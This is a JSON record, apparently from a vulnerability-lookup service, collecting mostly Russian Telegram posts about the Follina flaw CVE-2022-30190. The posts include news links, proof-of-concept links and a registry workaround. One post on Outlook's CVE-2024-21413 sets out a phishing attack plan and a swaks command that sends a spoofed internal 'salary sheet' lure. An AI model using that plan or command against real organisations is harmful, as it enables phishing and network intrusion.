\u0430\u0442\u0430\u043a\u0430\u0445. 
\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0443\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft Word.\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. 
\u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #vulnerability", "creation_timestamp": "2022-05-31T12:49:38.000000Z"}, {"uuid": "8965fd15-5fc9-41be-8c34-36fd584e95f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/3-wbVOTdAjOivPyAG2QBt9XaBCAIVLRC_c7I1h87YthbEus", "content": "", "creation_timestamp": "2026-01-08T15:00:07.000000Z"}, {"uuid": "e20dd3a0-50fd-4cfd-b1ce-535e0983d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/habr_com_news/6921", "content": "\u200bMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043f\u0430\u0442\u0447\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 
\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office CVE-2022-30190.\n\nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0435\u0441\u0442\u044c \u043f\u0430\u0442\u0447 \u043f\u0440\u043e\u0442\u0438\u0432 CVE-2022-30190. 
\u0418\u044e\u043d\u044c\u0441\u043a\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u043d\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Microsoft Security Response Center (MSRC), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0449\u0435 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0442\u0447\u0451\u0442\u044b \u043e\u0442 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u0432\u0435\u0442\u0438\u043b\u0438 \u043e\u0442\u043f\u0438\u0441\u043a\u043e\u0439, \u0447\u0442\u043e \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #microsoft #windows", "creation_timestamp": "2022-06-15T17:30:30.000000Z"}, {"uuid": "326f248b-88b3-49c7-aec2-24fb700718cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/poxek/1845", "content": "\u0422\u0443\u0442 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0433\u0440\u0435\u043c\u0435\u043b  \u043d\u0430 
\u0442\u0435\u043c\u0443 0-\u0434\u043d\u044f \u0432 \u043e\u0444\u0438\u0441\u0435 (CVE-2022-30190). \u0412\u0447\u0435\u0440\u0430 \u043c\u0430\u0439\u043a\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Guidance . \u0432 2\u0445 \u0441\u043b\u043e\u0432\u0430\u0445 \u043d\u0430\u0434\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c ms-msdt \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435. \ud83e\uddd1\u200d\ud83d\udd27\n\u0434\u0435\u043b\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0440\u0435\u0435\u0441\u0442\u0440\u0430\nreg export HKEY_CLASSES_ROOT\\ms-msdt filename\n\u0438 \u0443\u0434\u0430\u043b\u044f\u0435\u043c \u043a\u043b\u044e\u0447 ms-msdt\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f\n\n\u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0433\u043e\u0441\u043f\u043e\u0434\u0430 \u0432\u044b\u043a\u0430\u0442\u044f\u0442 \u043f\u0430\u0442\u0447, \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u0438\u043c\u043f\u043e\u0440\u0442\u043e\u043c \u0431\u044d\u043a\u0430\u043f\u0430\nreg import filename\n\n\u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f \u0447\u0442\u043e \u0417\u0430\u0449\u042b\u0442\u043d\u0438\u043a \u0432\u0438\u043d\u0434\u044b \u0440\u0430\u0441\u043f\u043e\u0437\u043d\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0432\u043a\u0443\u0441\u044c\u043d\u044f\u0445\u0443 \u043a\u0430\u043a \nTrojan:Win32/Mesdetty.A\u202f\nTrojan:Win32/Mesdetty.B\u202f   Behavior:Win32/MesdettyLaunch.A\nBehavior:Win32/MesdettyLaunch.B\nBehavior:Win32/MesdettyLaunch.C\u202f\n\u0412 \u043e\u0431\u0449\u0435\u043c, \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043a\u043b\u0438\u043a\u0430\u0439\u0442\u0435 \u043f\u043e 
\u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u0438\u043a\u0430\u043c \u0438 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0432\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043d\u044f \u0432 \u0447\u0438\u0441\u0442\u043e\u0442\u0435.\ud83e\uddfc \n\ud83c\udf0e \u041c\u0438\u0440\u0443 \u2014 \u043c\u0438\u0440!", "creation_timestamp": "2022-06-28T09:49:11.000000Z"}, {"uuid": "d3aeef07-e509-44bb-ac9a-d814493cdc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/25", "content": "Top Security News for 02/06/2022\n\nUS Supreme Court puts a hold on enforcement of Texas social media law. INTERPOL issues warning about various forms of online extortion. US Commerce Department will restrict cyber exports to China.\nhttps://thecyberwire.com/newsletters/policy-briefing/4/105 \n\nUnofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)\nhttps://www.reddit.com/r/netsec/comments/v2maa4/unofficial_patches_for_the_0day_vulnerability/ \n\nRansomware attack turns 2022 into 1977 for Somerset County\nhttps://malware.news/t/ransomware-attack-turns-2022-into-1977-for-somerset-county/60662/1 \n\nDiscord Is the Center of the Crypto World and That\u2019s a Problem\nhttps://www.vice.com/en_us/article/4awkew/discord-is-the-center-of-the-crypto-world-and-thats-a-problem \n\nNASA still \u201cpushing\u201d for a Russian cosmonaut to fly on next SpaceX mission\nhttps://arstechnica.com/?p=1856528 \n\nInformation Security BASICS - Anvil Secure\nhttps://www.reddit.com/r/netsec/comments/v2mrkd/information_security_basics_anvil_secure/ \n\nMinerva's evasion based CTF is open for registration\nhttps://www.reddit.com/r/netsec/comments/v2ehz0/minervas_evasion_based_ctf_is_open_for/ \n\nNSIS Installer Malware Included with Various Malicious 
Files\nhttps://malware.news/t/nsis-installer-malware-included-with-various-malicious-files/60663/1 \n\nMass account takeover in Yunmai smartscale API (full disclosure)\nhttps://www.reddit.com/r/netsec/comments/v0uv1g/mass_account_takeover_in_yunmai_smartscale_api/ \n\nOST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining &gt; 3 dozen CVEs from the last 3 years)\nhttps://www.reddit.com/r/netsec/comments/v2ep1m/ost2_vulnerabilities_1001_cfamily_software/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-02T05:00:06.000000Z"}, {"uuid": "00f76cbf-aa88-4ae6-a8e9-6b362f341fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/TopCyberTechNews/24", "content": "Top Security News for 01/06/2022\n\nCode execution 0-day in Windows has been under active exploit for 7 weeks\nhttps://arstechnica.com/?p=1857315 \n\nIs quantum teleportation the future of secure communications?\nhttps://blog.malwarebytes.com/reports/2022/05/is-quantum-teleportation-the-future-of-secure-communications/ \n\nFBI warns of education sector credentials on dark web forums\nhttps://blog.malwarebytes.com/privacy-2/2022/05/fbi-warns-of-education-sector-credentials-on-dark-web-forums/ \n\nRunescape phish claims your email has been changed\nhttps://blog.malwarebytes.com/scams/2022/05/runescape-phish-claims-your-email-has-been-changed/ \n\nMicrosoft Releases Workarounds for Office Vulnerability Under Active Exploitation\nhttps://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html \n\nMarjorie Taylor Greene Says Bill Gates Will Force You to Eat Burgers Made in a \u2018Peach Tree 
Dish\u2019\nhttps://www.vice.com/en_us/article/5dgne3/marjorie-taylor-greene-says-bill-gates-will-force-you-to-eat-burgers-made-in-a-peach-tree-dish \n\nTechnical Advisory: CVE-2022-30190 Zero-day Vulnerability \u201cFollina\u201d in Microsoft Support Diagnostic Tool\nhttps://malware.news/t/technical-advisory-cve-2022-30190-zero-day-vulnerability-follina-in-microsoft-support-diagnostic-tool/60610/1 \n\nSideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years\nhttps://thehackernews.com/2022/05/sidewinder-hackers-launched-over-1000.html \n\nInterpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks\nhttps://thehackernews.com/2022/05/interpol-nabs-3-nigerian-scammers.html \n\nThe Internet needs to stop getting excited by vaporware EVs\nhttps://arstechnica.com/?p=1857185 \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-01T05:00:04.000000Z"}, {"uuid": "1e14f148-7da7-41af-a046-61acd3705058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/malwar3s/3", "content": "https://github.com/NextSecurity/CVE-2022-30190-follina-Office-MSDT-Fixed", "creation_timestamp": "2023-02-25T05:20:10.000000Z"}, {"uuid": "0093fb79-fd53-4433-895c-f3e051cf5842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/127", "content": "Top Security News for 06/09/2022\n\nRansomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus\nhttps://thehackernews.com/2022/09/ransomware-attackers-abuse-genshin.html \n\nSAT/SMT Solvers by 
Example\nhttps://www.reddit.com/r/netsec/comments/x6y3hk/satsmt_solvers_by_example/ \n\nISC StormCast for Tuesday, September 6th, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8160 \n\nCVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files\nhttps://www.reddit.com/r/netsec/comments/x6aqwc/cve202230190_aka_follina_uses_macroless_word_docs/ \n\nPackMyPayload - Emerging Threat of Containerized Malware. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware.\nhttps://www.reddit.com/r/Malware/comments/x6xpb4/packmypayload_emerging_threat_of_containerized/ \n\nHacking my Helium Crypto Miner\nhttps://www.reddit.com/r/netsec/comments/x6d97k/hacking_my_helium_crypto_miner/ \n\nJPCERT/CC Releases URL Dataset of Confirmed Phishing Sites\nhttps://malware.news/t/jpcert-cc-releases-url-dataset-of-confirmed-phishing-sites/63125/1 \n\nISC Stormcast For Tuesday, September 6th, 2022 https://isc.sans.edu/podcastdetail.html?id=8160, (Tue, Sep 6th)\nhttps://malware.news/t/isc-stormcast-for-tuesday-september-6th-2022-https-isc-sans-edu-podcastdetail-html-id-8160-tue-sep-6th/63123/1 \n\nWalkthrough of an unauthenticated RCE affecting pfBlockerNG <= 2.1.4_26 (CVE-2022-31814)\nhttps://www.reddit.com/r/netsec/comments/x6b5is/walkthrough_of_an_unauthenticated_rce_affecting/ \n\nMicrosoft will disable Basic authentication for Exchange Online in less than a month\nhttps://www.malwarebytes.com/blog/news/2022/09/microsoft-to-disable-basic-auth-for-exchange-online-in-less-than-a-month \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-09-06T14:51:49.000000Z"}, {"uuid": "14ed86ac-57c4-48ac-8a11-50181d44e66d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": 
"https://t.me/beaverdreamer/134", "content": "#outlook #cve #social #CVE\n\u041f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21413 \u0432 Outlook (\u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432 API).\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0448\u0438\u0431\u043a\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URL, \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c ! \u0432 \u043a\u043e\u043d\u0435\u0446 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u044e\u0442 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0435\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u043e \u0441\u0445\u0435\u043c\u0435 file://).\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u043a\u043b\u0438\u043a\u043d\u0443\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 \u043f\u0438\u0441\u044c\u043c\u0435.\n\n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u0431\u0435\u0440\u0435\u043c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0442\u0440\u0438 
\u0444\u0430\u043a\u0442\u043e\u0440\u0430:\n- \u0412\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0441\u0435\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u0442\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (\u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0442\u0435\u043c \u0436\u0435 swaks)\n- \u0414\u043e\u0432\u0435\u0440\u0438\u0435 \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u043e\u0442 \u043a\u043e\u0433\u043e-\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u0448\u0435, \u0447\u0435\u043c \u0441\u043e \u0432\u043d\u0435\u0448\u043d\u0435\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b (\u0434\u0430 \u0438 \u0421\u0417\u0418 \u0441\u0442\u043e\u044f\u0442 \u043d\u0430 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0435)\n- \u0418\u043c\u044f \u0423\u0417 \u0447\u0430\u0441\u0442\u043e \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u0418 \u0441\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u043c \u043f\u0430\u0437\u043b \u0430\u0442\u0430\u043a\u0438 \u0431\u0435\u0437 \u0443\u0447\u0435\u0442\u043a\u0438:\n- \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u0435\u043c\u0435\u0439\u043b\u043e\u0432 (\u043e\u0442 \u043a\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438 \u043a\u043e\u043c\u0443 
\u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c)  \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0435\u0447\u043a\u0438;\n- \u0427\u0435\u0440\u0435\u0437 \u043a\u0435\u0440\u0431\u0435\u0440\u043e\u0441 \u0432\u044b\u0447\u043b\u0435\u043d\u044f\u0435\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043a\u0438;\n- \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0438\u043c \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043d\u0430\u0448\u0443 \u0448\u0430\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u0438\u043a;\n- \u0416\u0434\u0435\u043c \u043a\u043b\u0438\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 swaks (HTML \u043f\u0438\u0441\u044c\u043c\u043e + \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043a\u0430):\nswaks --to beaver02@beaver.lab --from beaver03@beaver.lab --server :25 --header \"Subject: \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443\" --body '\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c, \u0412\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443: \u0417\u0430\u0440\u043f\u043b\u0430\u0442\u043d\u0430\u044f \u0432\u0435\u0434\u043e\u043c\u043e\u0441\u0442\u044c \u0437\u0430 2023 \u0433\u043e\u0434' --add-header \"MIME-Version: 1.0\" --add-header \"Content-Type: text/html\" 
\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 0-Click RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 Word, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Foolina (CVE-2022-30190), \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0443\u0436\u0435 \u043f\u043e\u0444\u0438\u043a\u0448\u0435\u043d\u043e. \u041c\u0430\u043a\u0440\u043e\u0441\u044b \u043d\u0435 \u043f\u0440\u043e\u0439\u0434\u0443\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0447\u0435\u0440\u0435\u0437 API, \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f. 
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e API, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c RCE \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043d\u043e \u043f\u043e\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u043b\u0443\u043a.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n - \u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439: https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/\n - \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 MS \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413\n - \u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC Foolina (\u043d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439): https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2024-03-01T21:36:29.000000Z"}, {"uuid": "31200dad-8d16-442b-8013-092ffd1c0d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/monkey_hacker/28", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell 